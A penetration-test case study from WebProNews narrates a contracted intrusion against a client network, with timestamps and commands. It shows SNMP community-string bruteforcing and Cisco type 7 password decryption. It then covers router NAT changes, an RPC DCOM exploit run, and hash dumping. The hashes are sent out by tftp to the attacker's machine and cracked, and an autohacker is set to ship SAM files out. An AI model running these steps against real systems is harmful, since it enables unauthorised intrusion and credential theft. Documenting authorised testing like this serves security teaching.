WebProNews

This tutorial is more of a "case study", in which I describe a recent penetration test I performed. Due to the success of the penetration test (in a relatively very short time) I decided to share this experience with you.

Please note that all identifying details such as IP addresses and hostnames have been changed, to protect the vulnerable and innocent.

I would like to thank my anonymous client for allowing me to write up and publish this article.

Chain of Events:

1:20 am
I sit down in front of my screen, with a fresh cup of coffee. My goal is to remotely penetrate company.com, at their request, of course. The only prior information I have, is their domain name - company.com.

1:22 am
I decide to start out with a bit of DNS enumeration, in order to identify company.com's gateway routers / computers, and get a general idea about what kind of network they have. I use 'nslookup' to do this.

Gentoo Tools # nslookupNote: nslookup is deprecated and may be removed from future releases.Consider using the `dig' or `host' programs instead. Run nslookup withthe `-sil[ent]' option to prevent this message from appearing. set type=ns company.comServer: dns.isp.netAddress: dns.isp.net#53Non-authoritative answer: company.com nameserver = dns.isp.net. company.com nameserver = dns2.isp.net. Authoritative answers can be found from: dns.isp.net internet address = 193.117.205.95dns2.isp.net internet address = 193.117.205.94 set type=mx company.comServer: dns.isp.netAddress: dns.isp.net#53company.com mail exchanger = 10 mail.isp.net. company.com mail exchanger = 0 mail.company.com.

Nslookup suggests that company.com's dns records are managed by their ISP, which minimizes the probability of a successful DNS zone transfer .

I attempt to identify company.com's mail server, which ends up being "mail.company.com" (at cost 0). This suggests that company.com host their own mail server, on site.

1:30 am
I run nmap on mail.company.com, and find a variety of services running on it.

Gentoo Tools # nmap -sS mail.company.comStarting nmap 3.45 ( http://www.insecure.org/nmap/ ) at 2003-10-19 19:40 ISTInteresting ports on mail.company.com (234.212.54.3): (The 1644 ports scanned but not shown below are in state: closed) PORT STATE SERVICE23/tcp open telnet25/tcp open smtp79/tcp open finger80/tcp open http110/tcp open pop-3143/tcp open imapNmap run completed -- 1 IP address (1 host up) scanned in 26.304 secondsGentoo Tools #

"Strange" I think to myself. "A Mail server running 'Finger' service?". I run a quick UDP scan.

Gentoo Tools # nmap -sU -p 161-162 mail.company.comStarting nmap 3.45 ( http://www.insecure.org/nmap/ ) at 2003-10-19 19:48 IST>Interesting ports on mail.company.com (234.212.54.3): >PORT STATE SERVICE>161/udp open snmp>162/udp closed snmptrap>Nmap run completed -- 1 IP address (1 host up) scanned in 2.119 seconds>Gentoo Tools #

"Hmm, SNMP is enabled...Could this be a router?".

A quick telnet command to mail.company.com verifies my suspicions.

I immediately recognize the Cisco Telnet banner.

Gentoo Tools # nc -v mail.company.com 23 mail.company.com [234.212.54.3] 23 (telnet) open?User Access VerificationPassword: Gentoo Tools #

Apparently, mail.company.com is a router, PAT'ing ports into Internal Server(s) (Pop3, Http, Imap).

My next action is to attempt to identify the router, hoping it really is a Cisco. This can be done with SNMP - and Phillip Waytaens' SNMPEnum would do the job perfectly. The following is a shortened output of SNMPEnum:

Gentoo snmp # perl -w snmpenum.pl 234.212.54.3 public cisco.txt---------------------------------------- SYSTEM INFO---------------------------------------- Cisco Internetwork Operating System SoftwareIOS (tm) Software, Version 12.0(5)T, RELEASE SOFTWARE Copyright (c) 1986-1999 by cisco Systems, Inc. Compiled Thu 23-Jul-99 13:14 by CGentoo snmp #

I use the SNMPEnum script, assuming that the SNMP public community string is "public" (As SNMP is often misconfigured). Fortunately for me, this assumption is correct - However, the "read" community string has been changed.

I whip out my favorite SNMP community string bruteforce tool (Solarwinds SNMP Dictionary attack), and start pounding at the router, with my favorite dictionary file.

After a (long) while, I see the good news I was hoping for. I finally have the read-write community string. This would probably allow me to download the router's configuration (SNMP allows this). A quick turn with the modified "snmpbrute", and I tftp the router configuration file straight to my attacking machine.

1:55 am
Doing the "Wild Indian rain dance". I go to the kitchen for some more coffee.

1:58 am
I start looking at the cisco configuration file. It seems that the login and enable passwords are the same. I use a perl script to decrypt the "type 7" cisco encryption. The password turns out to be "therouter".

Current configuration: ! version 12.2no service pad! hostname mail.company.com! enable password 7 0958460C0B0A02060E1E! login transport input none stopbits 1line vty 0 4 password 7 0958460C0B0A02060E1E login! end

A deeper look into the router's configuration file, reveals their Internal mail / web server's internal address - 172.16.0.5.

The following is part of the Cisco configuration file that NAT's the ports from the router, to the internal mail/web server :

! ip nat inside source static tcp 172.16.0.5 143 234.212.54.3 143 extendableip nat inside source static tcp 172.16.0.5 80 234.212.54.3 80 extendableip nat inside source static tcp 172.16.0.5 110 234.212.54.3 110 extendableip nat inside source static tcp 172.16.0.5 25 234.212.54.3 25 extendable!

2:30 am
I sip my cold coffee, and start profiling the information I have up to now. In the backround, I verify that their internal server is indeed running windows 2000.

Gentoo# nc -n 234.212.54.3 80 HTTP/1.1 400 Bad RequestServer: Microsoft-IIS/5.0Date: Wed, 29 Oct 2003 20:09:02 GMTContent-Type: text/htmlContent-Length: 87Gentoo# nc -n 234.212.54.3 110+OK Microsoft Exchange 2000 POP3 server version 6.0.6249.0 (main.company.com) ready.Gentoo#

"Their internal server is most probably running Windows 2000. What are the chances that company.com feels secure - thinking that they are protected by their router? What are the chances they havn't patched their internal servers against some major vulnerabilities?" I decided to give it a shot.

2:38 am
My first choice is to attempt to use the rpc dcom exploit on their internal server, but in order to do this, I have to open up a few more ports on the router, and direct them to the internal mail / web server.

Router#conf t Enter configuration commands, one per line. End with CNTL/Z. Router(config)#ip nat inside source static tcp 172.16.0.5 139 234.212.54.3 139 extendableRouter(config)#ip nat inside source static tcp 172.16.0.5 135 234.212.54.3 135 extendableRouter(config)#ip nat inside source static tcp 172.16.0.5 445 234.212.54.3 445 extendableRouter(config)#ip nat inside source static tcp 172.16.0.5 3389 234.212.54.3 3389 extendableRouter(config)#ip nat inside source static tcp 172.16.0.5 10000 234.212.54.3 10000 extendable

While I'm at it, I'll open up all Netbios ports (for later SMB enumeration), and terminal services (I'm feeling lucky). I also open port 10000, knowing i'll need to open an extra port in order to connect my shell to the internal server.

I whip out my exploit toolkit (framework) and send the RPC Dcom exploit to the router, knowing that the exploit would be redirected to the internal server due to my recent NAT modificationson the router.

Gentoo # ./cli exp/msrpc_dcom1_overflow.exp payload=winbind rhost=mail.company.com lport=10000 OS=2K E [*] Generating payload winbind (x86, win32, bind)... [*] Payload generation complete (668 bytes) [*] Using return address 0x77838eef with scratch pad at 0x7ffde0cc [*] Connected to mail.company.com:10000... Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32>

3:01 am
Time for more coffee. It seems that my assumption paid off, this company has NOT patched their internal servers, due to a false sense of security. I now have SYSTEM privilages on their web / mail server.
I quickly upload pwdump4.exe in order to dump the password hashes to a files, for later, local cracking.

Once the hashes are dumped to a file, I tftp this file from their internal webserver back to my attacking machine.

Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32>tftp -i my.attacking.ip GET pwdump4.exe C:WINNTsystem32>pwdump4.exe 127.0.0.1 >company.com.hashes.txt C:WINNTsystem32>tftp -i my.attacking.ip PUT company.com.hashes.txt C:WINNTsystem32>

Usually, I'd use 'john the ripper' to crack these password hashes, however, I recently finished generating rainbow-crack's hash tables, and I thought i'de give it a try.

D:TOOLSpasswordRTGEN>rcrack.exe *.rt -f hash.txt reading lm_alpha-numeric_0_2400x40000000_bla.rt ... 315498496 bytes read, disk access time: 17.49 sverifying the file ... searching for 29 hashes ... plaintext of df168b2dd34bad07 is ***plaintext of ac59766adf048863 is ***... statistics------------------------------------------plaintext found: 24 of 29 (82.76%)total disk access time: 155.57 stotal cryptanalysis time: 428.81 stotal chain walk step: 151943227total false alarm: 66931total false alarm step: 56200430username password------------------------------------------Administrator T3L3PITADudu SINDYAnat REUVEN101.... D:TOOLSpasswordRTGEN>

Rainbow-crack proved to be an invaluable tool, and shortened the whole process of NTLM hash cracking to less than 10 minuets. Using john the ripper, this could have taken anywhere from one week to a couple of months.

3:30 am
Once the administrator password is found, I attempt to connect to port 3389 on mail.company.com - hoping that per-chance terminal services is enabled. It seems that lady luck was is my favor - and I receive a terminal services window. Using the cracked Administrator password, I log into the the web server - Mission completed.

3:37 am
To completely consolidate my control of the client's network, I upload a modified version of KaHT II (the RPC DCOM autohacker) and edit the macros.txt file, so that each successful exploitation would tftp the 'repair' sam file to my attacking machine.

At this stage, I stop my attack on the client's network, as the contract objectives are completed.

3:57 am
I take one last sip - What would I do without my coffee?

Click here to sign up for FREE Tech. newsletters from iEntry!

Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP
Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.